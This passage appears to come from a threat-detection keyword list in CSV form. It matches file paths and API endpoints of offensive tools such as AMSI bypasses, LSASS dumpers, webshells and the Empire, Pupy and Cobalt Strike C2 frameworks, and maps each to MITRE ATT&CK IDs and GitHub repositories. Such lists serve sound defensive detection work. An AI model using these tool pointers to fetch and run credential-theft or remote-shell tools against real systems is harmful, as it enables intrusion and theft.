TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/amsi.py*",".{0,1000}\/amsi\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Amsi_Bypass_In_2023*",".{0,1000}\/Amsi_Bypass_In_2023.{0,1000}","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","4","350","63","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" "*/AMSI_patch.git*",".{0,1000}\/AMSI_patch\.git.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*/AmsiBypass.*",".{0,1000}\/AmsiBypass\..{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*/Amsi-Bypass-Powershell.git*",".{0,1000}\/Amsi\-Bypass\-Powershell\.git.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*/Amsi-Killer.git*",".{0,1000}\/Amsi\-Killer\.git.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*/AmsiOpenSession.exe*",".{0,1000}\/AmsiOpenSession\.exe.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*/AMSI-Provider.git*",".{0,1000}\/AMSI\-Provider\.git.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","1","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*/AMSITrigger.git*",".{0,1000}\/AMSITrigger\.git.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*/Analyzer-Session.log*",".{0,1000}\/Analyzer\-Session\.log.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/AndrewSpecial.git*",".{0,1000}\/AndrewSpecial\.git.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","381","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*/android/pupydroid/*",".{0,1000}\/android\/pupydroid\/.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/ANGRYPUPPY.cna*",".{0,1000}\/ANGRYPUPPY\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*/antak.aspx*",".{0,1000}\/antak\.aspx.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/anthemtotheego/CredBandit*",".{0,1000}\/anthemtotheego\/CredBandit.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 
- T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*/anti_analysis.exe*",".{0,1000}\/anti_analysis\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/anti_debug.exe*",".{0,1000}\/anti_debug\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/AntiSandbox.go*",".{0,1000}\/AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/AntiSandbox.go*",".{0,1000}\/AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 
- TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/AntiTamper.exe*",".{0,1000}\/AntiTamper\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*/antx-code/CVE-2022-0847*",".{0,1000}\/antx\-code\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/antx-code/CVE-2022-0847","1","1","N/A","N/A","1","62","21","2022-03-08T09:14:25Z","2022-03-08T09:10:51Z" "*/AoratosWin/*",".{0,1000}\/AoratosWin\/.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*/apc_injection.exe*",".{0,1000}\/apc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/APCLdr.*",".{0,1000}\/APCLdr\..{0,1000}","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","4","300","52","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" 
"*/api/admin/shutdown?token=*",".{0,1000}\/api\/admin\/shutdown\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/agents/*/kill?token=*",".{0,1000}\/api\/agents\/.{0,1000}\/kill\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 
- T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/agents/all/kill?token=*",".{0,1000}\/api\/agents\/all\/kill\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/agents/all/shell?token=*",".{0,1000}\/api\/agents\/all\/shell\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/agents/CXPLDTZCKFNT3SLT/shell?*",".{0,1000}\/api\/agents\/CXPLDTZCKFNT3SLT\/shell\?.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - 
T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/agents/stale?token=*",".{0,1000}\/api\/agents\/stale\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 
- MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/agents/XMY2H2ZPFWNPGEAP?token=*",".{0,1000}\/api\/agents\/XMY2H2ZPFWNPGEAP\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/listeners/all?token=*",".{0,1000}\/api\/listeners\/all\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - 
T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/modules/collection/*?token=*",".{0,1000}\/api\/modules\/collection\/.{0,1000}\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - 
T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/modules/credentials*?token=*",".{0,1000}\/api\/modules\/credentials.{0,1000}\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/api/reporting/agent/initial?token=*",".{0,1000}\/api\/reporting\/agent\/initial\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary 
emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" 